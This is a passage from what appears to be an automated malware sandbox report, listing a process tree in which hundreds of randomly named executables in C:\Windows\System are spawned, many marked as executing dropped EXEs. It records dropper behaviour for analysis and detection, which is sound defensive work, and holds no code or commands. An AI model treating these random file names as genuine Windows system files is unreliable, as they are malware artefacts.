  C:\Windows\System\snoSBAJ.exe
  2⤵
  - Executes dropped EXE
  PID:1968
- C:\Windows\System\XEpncSP.exe
  C:\Windows\System\XEpncSP.exe
  2⤵
  - Executes dropped EXE
  PID:1528
- C:\Windows\System\MeIPttT.exe
  C:\Windows\System\MeIPttT.exe
  2⤵
  - Executes dropped EXE
  PID:5012
- C:\Windows\System\QsgjXIP.exe
  C:\Windows\System\QsgjXIP.exe
  2⤵
  - Executes dropped EXE
  PID:3648
- C:\Windows\System\UMPLaIk.exe
  C:\Windows\System\UMPLaIk.exe
  2⤵
  - Executes dropped EXE
  PID:3300
- C:\Windows\System\MNUcknI.exe
  C:\Windows\System\MNUcknI.exe
  2⤵
  - Executes dropped EXE
  PID:3920
- C:\Windows\System\RzAiXfF.exe
  C:\Windows\System\RzAiXfF.exe
  2⤵
  - Executes dropped EXE
  PID:4648
- C:\Windows\System\xWmlaiU.exe
  C:\Windows\System\xWmlaiU.exe
  2⤵
  - Executes dropped EXE
  PID:2592
- C:\Windows\System\WFvjQWg.exe
  C:\Windows\System\WFvjQWg.exe
  2⤵
  - Executes dropped EXE
  PID:4036
- C:\Windows\System\JawGfNP.exe
  C:\Windows\System\JawGfNP.exe
  2⤵
  - Executes dropped EXE
  PID:2408
- C:\Windows\System\XdhjEtO.exe
  C:\Windows\System\XdhjEtO.exe
  2⤵
  - Executes dropped EXE
  PID:3204
- C:\Windows\System\MfzdQsI.exe
  C:\Windows\System\MfzdQsI.exe
  2⤵
  - Executes dropped EXE
  PID:4772
- C:\Windows\System\cCYsDZO.exe
  C:\Windows\System\cCYsDZO.exe
  2⤵
  - Executes dropped EXE
  PID:4932
- C:\Windows\System\ayJeXMR.exe
  C:\Windows\System\ayJeXMR.exe
  2⤵
  - Executes dropped EXE
  PID:2692
- C:\Windows\System\XVddiTo.exe
  C:\Windows\System\XVddiTo.exe
  2⤵
  - Executes dropped EXE
  PID:1536
- C:\Windows\System\gcqNWPm.exe
  C:\Windows\System\gcqNWPm.exe
  2⤵
  - Executes dropped EXE
  PID:1988
- C:\Windows\System\cmBRfkx.exe
  C:\Windows\System\cmBRfkx.exe
  2⤵
  - Executes dropped EXE
  PID:5072
- C:\Windows\System\XvNrbMH.exe
  C:\Windows\System\XvNrbMH.exe
  2⤵
  - Executes dropped EXE
  PID:2784
- C:\Windows\System\yMqilAF.exe
  C:\Windows\System\yMqilAF.exe
  2⤵
  - Executes dropped EXE
  PID:2704
- C:\Windows\System\ugeMWXf.exe
  C:\Windows\System\ugeMWXf.exe
  2⤵
  - Executes dropped EXE
  PID:1348
- C:\Windows\System\yqfDRpB.exe
  C:\Windows\System\yqfDRpB.exe
  2⤵
  - Executes dropped EXE
  PID:1824
- C:\Windows\System\czVgbmp.exe
  C:\Windows\System\czVgbmp.exe
  2⤵
  - Executes dropped EXE
  PID:4928
- C:\Windows\System\kNiKKjp.exe
  C:\Windows\System\kNiKKjp.exe
  2⤵
  - Executes dropped EXE
  PID:1792
- C:\Windows\System\oAUviUp.exe
  C:\Windows\System\oAUviUp.exe
  2⤵
  - Executes dropped EXE
  PID:2440
- C:\Windows\System\CoRruSs.exe
  C:\Windows\System\CoRruSs.exe
  2⤵
  - Executes dropped EXE
  PID:3172
- C:\Windows\System\mdxYeNg.exe
  C:\Windows\System\mdxYeNg.exe
  2⤵
  - Executes dropped EXE
  PID:4832
- C:\Windows\System\iiNKvJY.exe
  C:\Windows\System\iiNKvJY.exe
  2⤵
  - Executes dropped EXE
  PID:5088
- C:\Windows\System\tOyCQMO.exe
  C:\Windows\System\tOyCQMO.exe
  2⤵
  - Executes dropped EXE
  PID:4140
- C:\Windows\System\NBffoKn.exe
  C:\Windows\System\NBffoKn.exe
  2⤵
  - Executes dropped EXE
  PID:2324
- C:\Windows\System\IGUsjRi.exe
  C:\Windows\System\IGUsjRi.exe
  2⤵
  - Executes dropped EXE
  PID:2556
- C:\Windows\System\trXgJpN.exe
  C:\Windows\System\trXgJpN.exe
  2⤵
  - Executes dropped EXE
  PID:1972
- C:\Windows\System\klEsPaq.exe
  C:\Windows\System\klEsPaq.exe
  2⤵
  - Executes dropped EXE
  PID:872
- C:\Windows\System\FdiPADU.exe
  C:\Windows\System\FdiPADU.exe
  2⤵
  - Executes dropped EXE
  PID:3696
- C:\Windows\System\qRdmQzB.exe
  C:\Windows\System\qRdmQzB.exe
  2⤵
  - Executes dropped EXE
  PID:2392
- C:\Windows\System\QFzbdnp.exe
  C:\Windows\System\QFzbdnp.exe
  2⤵
  - Executes dropped EXE
  PID:404
- C:\Windows\System\mGCYYPA.exe
  C:\Windows\System\mGCYYPA.exe
  2⤵
  - Executes dropped EXE
  PID:4688
- C:\Windows\System\tTOUlEM.exe
  C:\Windows\System\tTOUlEM.exe
  2⤵
  - Executes dropped EXE
  PID:4252
- C:\Windows\System\aBHmbWg.exe
  C:\Windows\System\aBHmbWg.exe
  2⤵
  - Executes dropped EXE
  PID:4824
- C:\Windows\System\NzFbyFC.exe
  C:\Windows\System\NzFbyFC.exe
  2⤵
  - Executes dropped EXE
  PID:4444
- C:\Windows\System\UcPQLsE.exe
  C:\Windows\System\UcPQLsE.exe
  2⤵
  - Executes dropped EXE
  PID:2476
- C:\Windows\System\LlYjKgL.exe
  C:\Windows\System\LlYjKgL.exe
  2⤵
  - Executes dropped EXE
  PID:4572
- C:\Windows\System\rrhALPf.exe
  C:\Windows\System\rrhALPf.exe
  2⤵
  - Executes dropped EXE
  PID:4312
- C:\Windows\System\CosdsLa.exe
  C:\Windows\System\CosdsLa.exe
  2⤵
  - Executes dropped EXE
  PID:1924
- C:\Windows\System\VBKNIIG.exe
  C:\Windows\System\VBKNIIG.exe
  2⤵
  - Executes dropped EXE
  PID:4552
- C:\Windows\System\LpuVRdA.exe
  C:\Windows\System\LpuVRdA.exe
  2⤵
  - Executes dropped EXE
  PID:3492
- C:\Windows\System\rHWRIvi.exe
  C:\Windows\System\rHWRIvi.exe
  2⤵
  - Executes dropped EXE
  PID:4260
- C:\Windows\System\QCgNFmR.exe
  C:\Windows\System\QCgNFmR.exe
  2⤵
  - Executes dropped EXE
  PID:2076
- C:\Windows\System\BYRLqbr.exe
  C:\Windows\System\BYRLqbr.exe
  2⤵
  - Executes dropped EXE
  PID:2412
- C:\Windows\System\lWcZMQe.exe
  C:\Windows\System\lWcZMQe.exe
  2⤵
  - Executes dropped EXE
  PID:2292
- C:\Windows\System\NoHSjqH.exe
  C:\Windows\System\NoHSjqH.exe
  2⤵
  - Executes dropped EXE
  PID:3412
- C:\Windows\System\HZyCMWY.exe
  C:\Windows\System\HZyCMWY.exe
  2⤵
  - Executes dropped EXE
  PID:1676
- C:\Windows\System\uHoJFYJ.exe
  C:\Windows\System\uHoJFYJ.exe
  2⤵
  - Executes dropped EXE
  PID:4324
- C:\Windows\System\wqFPATU.exe
  C:\Windows\System\wqFPATU.exe
  2⤵
  - Executes dropped EXE
  PID:3324
- C:\Windows\System\amTIGal.exe
  C:\Windows\System\amTIGal.exe
  2⤵
  - Executes dropped EXE
  PID:1856
- C:\Windows\System\rMXuvlk.exe
  C:\Windows\System\rMXuvlk.exe
  2⤵
  - Executes dropped EXE
  PID:364
- C:\Windows\System\BrCScRv.exe
  C:\Windows\System\BrCScRv.exe
  2⤵
  - Executes dropped EXE
  PID:4788
- C:\Windows\System\RihmJJP.exe
  C:\Windows\System\RihmJJP.exe
  2⤵
  - Executes dropped EXE
  PID:3688
- C:\Windows\System\vJJqbcY.exe
  C:\Windows\System\vJJqbcY.exe
  2⤵
  - Executes dropped EXE
  PID:2568
- C:\Windows\System\omBJkGT.exe
  C:\Windows\System\omBJkGT.exe
  2⤵
  - Executes dropped EXE
  PID:3140
- C:\Windows\System\FzVZuJt.exe
  C:\Windows\System\FzVZuJt.exe
  2⤵
  - Executes dropped EXE
  PID:688
- C:\Windows\System\QXxqGup.exe
  C:\Windows\System\QXxqGup.exe
  2⤵
  - Executes dropped EXE
  PID:2220
- C:\Windows\System\hUsCnOL.exe
  C:\Windows\System\hUsCnOL.exe
  2⤵
  - Executes dropped EXE
  PID:3740
- C:\Windows\System\IIWJXCP.exe
  C:\Windows\System\IIWJXCP.exe
  2⤵
  - Executes dropped EXE
  PID:4304
- C:\Windows\System\GSPeAhE.exe
  C:\Windows\System\GSPeAhE.exe
  2⤵
  PID:2008
- C:\Windows\System\mpSUMFn.exe
  C:\Windows\System\mpSUMFn.exe
  2⤵
  PID:2460
- C:\Windows\System\sFSNaLS.exe
  C:\Windows\System\sFSNaLS.exe
  2⤵
  PID:4728
- C:\Windows\System\RuOeEwB.exe
  C:\Windows\System\RuOeEwB.exe
  2⤵
  PID:3340
- C:\Windows\System\SmysHXl.exe
  C:\Windows\System\SmysHXl.exe
  2⤵
  PID:1728
- C:\Windows\System\HkLYwXY.exe
  C:\Windows\System\HkLYwXY.exe
  2⤵
  PID:5152
- C:\Windows\System\fSASBeo.exe
  C:\Windows\System\fSASBeo.exe
  2⤵
  PID:5180
- C:\Windows\System\fEJUEDS.exe
  C:\Windows\System\fEJUEDS.exe
  2⤵
  PID:5212
- C:\Windows\System\RAoDzqt.exe
  C:\Windows\System\RAoDzqt.exe
  2⤵
  PID:5240
- C:\Windows\System\AbYPOJj.exe
  C:\Windows\System\AbYPOJj.exe
  2⤵
  PID:5272
- C:\Windows\System\wdMpHCq.exe
  C:\Windows\System\wdMpHCq.exe
  2⤵
  PID:5300
- C:\Windows\System\oBZuCqj.exe
  C:\Windows\System\oBZuCqj.exe
  2⤵
  PID:5332
- C:\Windows\System\UauEKHN.exe
  C:\Windows\System\UauEKHN.exe
  2⤵
  PID:5360
- C:\Windows\System\vPtWczw.exe
  C:\Windows\System\vPtWczw.exe
  2⤵
  PID:5388
- C:\Windows\System\fwExqam.exe
  C:\Windows\System\fwExqam.exe
  2⤵
  PID:5416
- C:\Windows\System\SieOHlD.exe
  C:\Windows\System\SieOHlD.exe
  2⤵
  PID:5444
- C:\Windows\System\lbeLkOG.exe
  C:\Windows\System\lbeLkOG.exe
  2⤵
  PID:5472
- C:\Windows\System\XLSjZMB.exe
  C:\Windows\System\XLSjZMB.exe
  2⤵
  PID:5500
- C:\Windows\System\ZhzLCum.exe
  C:\Windows\System\ZhzLCum.exe
  2⤵
  PID:5528
- C:\Windows\System\biyTpZw.exe
  C:\Windows\System\biyTpZw.exe
  2⤵
  PID:5556
- C:\Windows\System\rsZDzBx.exe
  C:\Windows\System\rsZDzBx.exe
  2⤵
  PID:5584
- C:\Windows\System\TlTPsGr.exe
  C:\Windows\System\TlTPsGr.exe
  2⤵
  PID:5612
- C:\Windows\System\mkSUxJA.exe
  C:\Windows\System\mkSUxJA.exe
  2⤵
  PID:5640
- C:\Windows\System\ONNpGuL.exe
  C:\Windows\System\ONNpGuL.exe
  2⤵
  PID:5668
- C:\Windows\System\TCLWkom.exe
  C:\Windows\System\TCLWkom.exe
  2⤵
  PID:5696
- C:\Windows\System\yGmdgOJ.exe
  C:\Windows\System\yGmdgOJ.exe
  2⤵
  PID:5724
- C:\Windows\System\IwAwrGZ.exe
  C:\Windows\System\IwAwrGZ.exe
  2⤵
  PID:5752
- C:\Windows\System\LVmPaWR.exe
  C:\Windows\System\LVmPaWR.exe
  2⤵
  PID:5780
- C:\Windows\System\JwEKIWz.exe
  C:\Windows\System\JwEKIWz.exe
  2⤵
  PID:5808
- C:\Windows\System\LFFuukk.exe
  C:\Windows\System\LFFuukk.exe
  2⤵
  PID:5836
- C:\Windows\System\LbkDupB.exe
  C:\Windows\System\LbkDupB.exe
  2⤵
  PID:5864
- C:\Windows\System\LeuUNxw.exe
  C:\Windows\System\LeuUNxw.exe
  2⤵
  PID:5888
- C:\Windows\System\VseILmn.exe
  C:\Windows\System\VseILmn.exe
  2⤵
  PID:5916
- C:\Windows\System\PDQoOBT.exe
  C:\Windows\System\PDQoOBT.exe
  2⤵
  PID:5948
- C:\Windows\System\dLVPeVY.exe
  C:\Windows\System\dLVPeVY.exe
  2⤵
  PID:5976
- C:\Windows\System\XBPoiiD.exe
  C:\Windows\System\XBPoiiD.exe
  2⤵
  PID:6000
- C:\Windows\System\QDFhhCQ.exe
  C:\Windows\System\QDFhhCQ.exe
  2⤵
  PID:6032
- C:\Windows\System\uigCSjH.exe
  C:\Windows\System\uigCSjH.exe
  2⤵
  PID:6060
- C:\Windows\System\AwXYhnV.exe
  C:\Windows\System\AwXYhnV.exe
  2⤵
  PID:6088
- C:\Windows\System\VYlUWSn.exe
  C:\Windows\System\VYlUWSn.exe
  2⤵
  PID:6112
- C:\Windows\System\TzBJACJ.exe
  C:\Windows\System\TzBJACJ.exe
  2⤵
  PID:6140
- C:\Windows\System\yBrIWCc.exe
  C:\Windows\System\yBrIWCc.exe
  2⤵
  PID:2872
- C:\Windows\System\YomLlOt.exe
  C:\Windows\System\YomLlOt.exe
  2⤵
  PID:1068
- C:\Windows\System\riLMOCJ.exe
  C:\Windows\System\riLMOCJ.exe
  2⤵
  PID:4956
- C:\Windows\System\DpUDhwz.exe
  C:\Windows\System\DpUDhwz.exe
  2⤵
  PID:3708
- C:\Windows\System\ZPsjbxv.exe
  C:\Windows\System\ZPsjbxv.exe
  2⤵
  PID:1896
- C:\Windows\System\SQUyKtq.exe
  C:\Windows\System\SQUyKtq.exe
  2⤵
  PID:5136
- C:\Windows\System\wBbvcXS.exe
  C:\Windows\System\wBbvcXS.exe
  2⤵
  PID:5200
- C:\Windows\System\IqbcOqO.exe
  C:\Windows\System\IqbcOqO.exe
  2⤵
  PID:5264
- C:\Windows\System\SHQiVha.exe
  C:\Windows\System\SHQiVha.exe
  2⤵
  PID:5324
- C:\Windows\System\XDceZOu.exe
  C:\Windows\System\XDceZOu.exe
  2⤵
  PID:5400
- C:\Windows\System\mywpvDP.exe
  C:\Windows\System\mywpvDP.exe
  2⤵
  PID:5460
- C:\Windows\System\fBhasiV.exe
  C:\Windows\System\fBhasiV.exe
  2⤵
  PID:5520
- C:\Windows\System\GfrZVRJ.exe
  C:\Windows\System\GfrZVRJ.exe
  2⤵
  PID:5596
- C:\Windows\System\fVwLdvq.exe
  C:\Windows\System\fVwLdvq.exe
  2⤵
  PID:5656
- C:\Windows\System\fIxoOBv.exe
  C:\Windows\System\fIxoOBv.exe
  2⤵
  PID:5716
- C:\Windows\System\sihXbkk.exe
  C:\Windows\System\sihXbkk.exe
  2⤵
  PID:5772
- C:\Windows\System\JHAVsgW.exe
  C:\Windows\System\JHAVsgW.exe
  2⤵
  PID:5848
- C:\Windows\System\pquLpow.exe
  C:\Windows\System\pquLpow.exe
  2⤵
  PID:5912
- C:\Windows\System\UPmBvJl.exe
  C:\Windows\System\UPmBvJl.exe
  2⤵
  PID:5988
- C:\Windows\System\nxmkGwO.exe
  C:\Windows\System\nxmkGwO.exe
  2⤵
  PID:6048
- C:\Windows\System\dkHQNHD.exe
  C:\Windows\System\dkHQNHD.exe
  2⤵
  PID:6108
- C:\Windows\System\OTeyRzp.exe
  C:\Windows\System\OTeyRzp.exe
  2⤵
  PID:2572
- C:\Windows\System\nZzyPeU.exe
  C:\Windows\System\nZzyPeU.exe
  2⤵
  PID:1816
- C:\Windows\System\QVnFedT.exe
  C:\Windows\System\QVnFedT.exe
  2⤵
  PID:1256
- C:\Windows\System\uLLruba.exe
  C:\Windows\System\uLLruba.exe
  2⤵
  PID:5252
- C:\Windows\System\mvKMsBW.exe
  C:\Windows\System\mvKMsBW.exe
  2⤵
  PID:5428
- C:\Windows\System\ehMVjPu.exe
  C:\Windows\System\ehMVjPu.exe
  2⤵
  PID:5572
- C:\Windows\System\gFGOhqq.exe
  C:\Windows\System\gFGOhqq.exe
  2⤵
  PID:5744
- C:\Windows\System\mywwTOO.exe
  C:\Windows\System\mywwTOO.exe
  2⤵
  PID:5884
- C:\Windows\System\lOEULha.exe
  C:\Windows\System\lOEULha.exe
  2⤵
  PID:6168
- C:\Windows\System\ttwYYBL.exe
  C:\Windows\System\ttwYYBL.exe
  2⤵
  PID:6196
- C:\Windows\System\EtOXhSw.exe
  C:\Windows\System\EtOXhSw.exe
  2⤵
  PID:6224
- C:\Windows\System\oCUaEny.exe
  C:\Windows\System\oCUaEny.exe
  2⤵
  PID:6252
- C:\Windows\System\lEqxPxa.exe
  C:\Windows\System\lEqxPxa.exe
  2⤵
  PID:6280
- C:\Windows\System\hvMNRAe.exe
  C:\Windows\System\hvMNRAe.exe
  2⤵
  PID:6308
- C:\Windows\System\FCQGKIV.exe
  C:\Windows\System\FCQGKIV.exe
  2⤵
  PID:6336
- C:\Windows\System\puSoKKM.exe
  C:\Windows\System\puSoKKM.exe
  2⤵
  PID:6364
- C:\Windows\System\skwMWQJ.exe
  C:\Windows\System\skwMWQJ.exe
  2⤵
  PID:6388
- C:\Windows\System\KjecQRa.exe
  C:\Windows\System\KjecQRa.exe
  2⤵
  PID:6416
- C:\Windows\System\qQqFCSF.exe
  C:\Windows\System\qQqFCSF.exe
  2⤵
  PID:6448
- C:\Windows\System\vIRGeDN.exe
  C:\Windows\System\vIRGeDN.exe
  2⤵
  PID:6476
- C:\Windows\System\NofpIec.exe
  C:\Windows\System\NofpIec.exe
  2⤵
  PID:6500
- C:\Windows\System\INHgjVx.exe
  C:\Windows\System\INHgjVx.exe
  2⤵
  PID:6532
- C:\Windows\System\YJDBcWu.exe
  C:\Windows\System\YJDBcWu.exe
  2⤵
  PID:6560
- C:\Windows\System\wuEjHNj.exe
  C:\Windows\System\wuEjHNj.exe
  2⤵
  PID:6588
- C:\Windows\System\fMTHFxG.exe
  C:\Windows\System\fMTHFxG.exe
  2⤵
  PID:6616
- C:\Windows\System\VqLlUwq.exe
  C:\Windows\System\VqLlUwq.exe
  2⤵
  PID:6644
- C:\Windows\System\dbebUlo.exe
  C:\Windows\System\dbebUlo.exe
  2⤵
  PID:6672
- C:\Windows\System\PlOMZwO.exe
  C:\Windows\System\PlOMZwO.exe
  2⤵
  PID:6700
- C:\Windows\System\SnCSXCL.exe
  C:\Windows\System\SnCSXCL.exe
  2⤵
  PID:6732
- C:\Windows\System\rQmyOss.exe
  C:\Windows\System\rQmyOss.exe
  2⤵
  PID:6756
- C:\Windows\System\DXoQonw.exe
  C:\Windows\System\DXoQonw.exe
  2⤵
  PID:6784
- C:\Windows\System\nkDpybP.exe
  C:\Windows\System\nkDpybP.exe
  2⤵
  PID:6812
- C:\Windows\System\iJYJLKD.exe
  C:\Windows\System\iJYJLKD.exe
  2⤵
  PID:6840
- C:\Windows\System\uxXeDAr.exe
  C:\Windows\System\uxXeDAr.exe
  2⤵
  PID:6868
- C:\Windows\System\RzEQsei.exe
  C:\Windows\System\RzEQsei.exe
  2⤵
  PID:6896
- C:\Windows\System\xVwWYlh.exe
  C:\Windows\System\xVwWYlh.exe
  2⤵
  PID:6924
- C:\Windows\System\FJUFzdc.exe
  C:\Windows\System\FJUFzdc.exe
  2⤵
  PID:6952
- C:\Windows\System\ajIFnqL.exe
  C:\Windows\System\ajIFnqL.exe
  2⤵
  PID:6980
- C:\Windows\System\bsnkCnn.exe
  C:\Windows\System\bsnkCnn.exe
  2⤵
  PID:7008
- C:\Windows\System\SkXMEng.exe
  C:\Windows\System\SkXMEng.exe
  2⤵
  PID:7036
- C:\Windows\System\uRLSghc.exe
  C:\Windows\System\uRLSghc.exe
  2⤵
  PID:7060
- C:\Windows\System\PSfGFhN.exe
  C:\Windows\System\PSfGFhN.exe
  2⤵
  PID:7088
- C:\Windows\System\KGzuWld.exe
  C:\Windows\System\KGzuWld.exe
  2⤵
  PID:7120
- C:\Windows\System\yusfZrp.exe
  C:\Windows\System\yusfZrp.exe
  2⤵
  PID:7148
- C:\Windows\System\llWAulW.exe
  C:\Windows\System\llWAulW.exe
  2⤵
  PID:5960
- C:\Windows\System\DivrWSF.exe
  C:\Windows\System\DivrWSF.exe
  2⤵
  PID:6100
- C:\Windows\System\LJlvtrD.exe
  C:\Windows\System\LJlvtrD.exe
  2⤵
  PID:5100
- C:\Windows\System\DoNgKuk.exe
  C:\Windows\System\DoNgKuk.exe
  2⤵
  PID:5376
- C:\Windows\System\pPmzQrM.exe
  C:\Windows\System\pPmzQrM.exe
  2⤵
  PID:5688
- C:\Windows\System\lkoKeab.exe
  C:\Windows\System\lkoKeab.exe
  2⤵
  PID:6184
- C:\Windows\System\SWiADxL.exe
  C:\Windows\System\SWiADxL.exe
  2⤵
  PID:6244
- C:\Windows\System\ZhmMSVB.exe
  C:\Windows\System\ZhmMSVB.exe
  2⤵
  PID:6320
- C:\Windows\System\ZKLuLPl.exe
  C:\Windows\System\ZKLuLPl.exe
  2⤵
  PID:6380
- C:\Windows\System\gxeggon.exe
  C:\Windows\System\gxeggon.exe
  2⤵
  PID:6436
- C:\Windows\System\ylkEmmM.exe
  C:\Windows\System\ylkEmmM.exe
  2⤵
  PID:6496
- C:\Windows\System\IcWHfkR.exe
  C:\Windows\System\IcWHfkR.exe
  2⤵
  PID:6572
- C:\Windows\System\QiSKtxQ.exe
  C:\Windows\System\QiSKtxQ.exe
  2⤵
  PID:6632
- C:\Windows\System\VZSLskd.exe
  C:\Windows\System\VZSLskd.exe
  2⤵
  PID:6692
- C:\Windows\System\xoodnjI.exe
  C:\Windows\System\xoodnjI.exe
  2⤵
  PID:6752
- C:\Windows\System\rQYprdt.exe
  C:\Windows\System\rQYprdt.exe
  2⤵
  PID:6804
- C:\Windows\System\bYAxrPL.exe
  C:\Windows\System\bYAxrPL.exe
  2⤵
  PID:6860
- C:\Windows\System\LHekchR.exe
  C:\Windows\System\LHekchR.exe
  2⤵
  PID:6936
- C:\Windows\System\TMxpFbk.exe
  C:\Windows\System\TMxpFbk.exe
  2⤵
  PID:6996
- C:\Windows\System\pBxDxcU.exe
  C:\Windows\System\pBxDxcU.exe
  2⤵
  PID:7052
- C:\Windows\System\WVQPYoa.exe
  C:\Windows\System\WVQPYoa.exe
  2⤵
  PID:7108
- C:\Windows\System\nPhEDEN.exe
  C:\Windows\System\nPhEDEN.exe
  2⤵
  PID:5940
- C:\Windows\System\iekyBGZ.exe
  C:\Windows\System\iekyBGZ.exe
  2⤵
  PID:5228
- C:\Windows\System\HyWMkhd.exe
  C:\Windows\System\HyWMkhd.exe
  2⤵
  PID:6156
- C:\Windows\System\wpIiIfW.exe
  C:\Windows\System\wpIiIfW.exe
  2⤵
  PID:6296
- C:\Windows\System\yDmLnQR.exe
  C:\Windows\System\yDmLnQR.exe
  2⤵
  PID:6432
- C:\Windows\System\AIkNTvr.exe
  C:\Windows\System\AIkNTvr.exe
  2⤵
  PID:6600
- C:\Windows\System\zTkbYSG.exe
  C:\Windows\System\zTkbYSG.exe
  2⤵
  PID:6740
- C:\Windows\System\yxcuHxO.exe
  C:\Windows\System\yxcuHxO.exe
  2⤵
  PID:6832
- C:\Windows\System\VbRqnuw.exe
  C:\Windows\System\VbRqnuw.exe
  2⤵
  PID:6972
- C:\Windows\System\GxYMEQR.exe
  C:\Windows\System\GxYMEQR.exe
  2⤵
  PID:7104
- C:\Windows\System\VtWBwbt.exe
  C:\Windows\System\VtWBwbt.exe
  2⤵
  PID:7196
- C:\Windows\System\UUyXSid.exe
  C:\Windows\System\UUyXSid.exe
  2⤵
  PID:7224
- C:\Windows\System\pBYHBGs.exe
  C:\Windows\System\pBYHBGs.exe
  2⤵
  PID:7248
- C:\Windows\System\zCwJmwF.exe
  C:\Windows\System\zCwJmwF.exe
  2⤵
  PID:7276
- C:\Windows\System\yskZGNu.exe
  C:\Windows\System\yskZGNu.exe
  2⤵
  PID:7308
- C:\Windows\System\YzgGoaG.exe
  C:\Windows\System\YzgGoaG.exe
  2⤵
  PID:7336
- C:\Windows\System\XJkAPIp.exe
  C:\Windows\System\XJkAPIp.exe
  2⤵
  PID:7364
- C:\Windows\System\NEqjBqN.exe
  C:\Windows\System\NEqjBqN.exe
  2⤵
  PID:7392
- C:\Windows\System\UWbDyoY.exe
  C:\Windows\System\UWbDyoY.exe
  2⤵
  PID:7420
- C:\Windows\System\iIGJZBn.exe
  C:\Windows\System\iIGJZBn.exe
  2⤵
  PID:7448
- C:\Windows\System\TUnECns.exe
  C:\Windows\System\TUnECns.exe
  2⤵
  PID:7476
- C:\Windows\System\zbbAfek.exe
  C:\Windows\System\zbbAfek.exe
  2⤵
  PID:7504
- C:\Windows\System\jVBfYAa.exe
  C:\Windows\System\jVBfYAa.exe
  2⤵
  PID:7532
- C:\Windows\System\vucZmNt.exe
  C:\Windows\System\vucZmNt.exe
  2⤵
  PID:7560
- C:\Windows\System\hXnnCUA.exe
  C:\Windows\System\hXnnCUA.exe
  2⤵
  PID:7588
- C:\Windows\System\auNJkyQ.exe
  C:\Windows\System\auNJkyQ.exe
  2⤵
  PID:7616
- C:\Windows\System\tsnxFhX.exe
  C:\Windows\System\tsnxFhX.exe
  2⤵
  PID:7644
- C:\Windows\System\ZguRFIp.exe
  C:\Windows\System\ZguRFIp.exe
  2⤵
  PID:7672
- C:\Windows\System\pFLiLmZ.exe
  C:\Windows\System\pFLiLmZ.exe
  2⤵
  PID:7700
- C:\Windows\System\VaenCnV.exe
  C:\Windows\System\VaenCnV.exe
  2⤵
  PID:7728
- C:\Windows\System\TmWTWex.exe
  C:\Windows\System\TmWTWex.exe
  2⤵
  PID:7756
- C:\Windows\System\DPQsVce.exe
  C:\Windows\System\DPQsVce.exe
  2⤵
  PID:7792
- C:\Windows\System\XqDNUFS.exe
  C:\Windows\System\XqDNUFS.exe
  2⤵
  PID:7824
- C:\Windows\System\gzawRjm.exe
  C:\Windows\System\gzawRjm.exe
  2⤵
  PID:7840
- C:\Windows\System\IUGJxco.exe
  C:\Windows\System\IUGJxco.exe
  2⤵
  PID:7868
- C:\Windows\System\DjpijIU.exe
  C:\Windows\System\DjpijIU.exe
  2⤵
  PID:7896
- C:\Windows\System\bkkdyzB.exe
  C:\Windows\System\bkkdyzB.exe
  2⤵
  PID:7920
- C:\Windows\System\TaWxVkL.exe
  C:\Windows\System\TaWxVkL.exe
  2⤵
  PID:7952
- C:\Windows\System\RcZKzrT.exe
  C:\Windows\System\RcZKzrT.exe
  2⤵
  PID:7980
- C:\Windows\System\TdLkczB.exe
  C:\Windows\System\TdLkczB.exe
  2⤵
  PID:8008
- C:\Windows\System\hovnYPm.exe
  C:\Windows\System\hovnYPm.exe
  2⤵
  PID:8036
- C:\Windows\System\wOhWaxX.exe
  C:\Windows\System\wOhWaxX.exe
  2⤵
  PID:8064
- C:\Windows\System\QHvgnia.exe
  C:\Windows\System\QHvgnia.exe
  2⤵
  PID:8092
- C:\Windows\System\swrHbOs.exe
  C:\Windows\System\swrHbOs.exe
  2⤵
  PID:8120
- C:\Windows\System\rszNyLX.exe
  C:\Windows\System\rszNyLX.exe
  2⤵
  PID:8148
- C:\Windows\System\zJgVMwP.exe
  C:\Windows\System\zJgVMwP.exe
  2⤵
  PID:8176
- C:\Windows\System\rfehizz.exe
  C:\Windows\System\rfehizz.exe
  2⤵
  PID:7164
- C:\Windows\System\ulcLcCU.exe
  C:\Windows\System\ulcLcCU.exe
  2⤵
  PID:2252
- C:\Windows\System\eATLbUQ.exe
  C:\Windows\System\eATLbUQ.exe
  2⤵
  PID:6356
- C:\Windows\System\fGgzBOq.exe
  C:\Windows\System\fGgzBOq.exe
  2⤵
  PID:6684
- C:\Windows\System\JnrYxHt.exe
  C:\Windows\System\JnrYxHt.exe
  2⤵
  PID:7028
- C:\Windows\System\xBIJYAk.exe
  C:\Windows\System\xBIJYAk.exe
  2⤵
  PID:7212
- C:\Windows\System\hOtWJGp.exe
  C:\Windows\System\hOtWJGp.exe
  2⤵
  PID:7272
- C:\Windows\System\lAtQjZc.exe
  C:\Windows\System\lAtQjZc.exe
  2⤵
  PID:7328
- C:\Windows\System\JXhYzHL.exe
  C:\Windows\System\JXhYzHL.exe
  2⤵
  PID:7384
- C:\Windows\System\DJTgDYN.exe
  C:\Windows\System\DJTgDYN.exe
  2⤵
  PID:7460
- C:\Windows\System\sfRvyyP.exe
  C:\Windows\System\sfRvyyP.exe
  2⤵
  PID:7520
- C:\Windows\System\ihXGzGF.exe
  C:\Windows\System\ihXGzGF.exe
  2⤵
  PID:7580
- C:\Windows\System\xFPfZmw.exe
  C:\Windows\System\xFPfZmw.exe
  2⤵
  PID:7656
- C:\Windows\System\HmxGvpT.exe
  C:\Windows\System\HmxGvpT.exe
  2⤵
  PID:7716
- C:\Windows\System\uBvIaSH.exe
  C:\Windows\System\uBvIaSH.exe
  2⤵
  PID:7776
- C:\Windows\System\cEDbDgF.exe
  C:\Windows\System\cEDbDgF.exe
  2⤵
  PID:7832
- C:\Windows\System\RIkRmJT.exe
  C:\Windows\System\RIkRmJT.exe
  2⤵
  PID:7888
- C:\Windows\System\ZmeHoKt.exe
  C:\Windows\System\ZmeHoKt.exe
  2⤵
  PID:7964
- C:\Windows\System\stJoeVD.exe
  C:\Windows\System\stJoeVD.exe
  2⤵
  PID:8024
- C:\Windows\System\LCgYZrd.exe
  C:\Windows\System\LCgYZrd.exe
  2⤵
  PID:8084
- C:\Windows\System\ZpvesBU.exe
  C:\Windows\System\ZpvesBU.exe
  2⤵
  PID:8140
- C:\Windows\System\ckzxjzm.exe
  C:\Windows\System\ckzxjzm.exe
  2⤵
  PID:2492
- C:\Windows\System\pzddlcS.exe
  C:\Windows\System\pzddlcS.exe
  2⤵
  PID:6524
- C:\Windows\System\pUBOoil.exe
  C:\Windows\System\pUBOoil.exe
  2⤵
  PID:6908
- C:\Windows\System\UeVLOmF.exe
  C:\Windows\System\UeVLOmF.exe
  2⤵
  PID:7240
- C:\Windows\System\PakTvus.exe
  C:\Windows\System\PakTvus.exe
  2⤵
  PID:2024
- C:\Windows\System\KCJBttm.exe
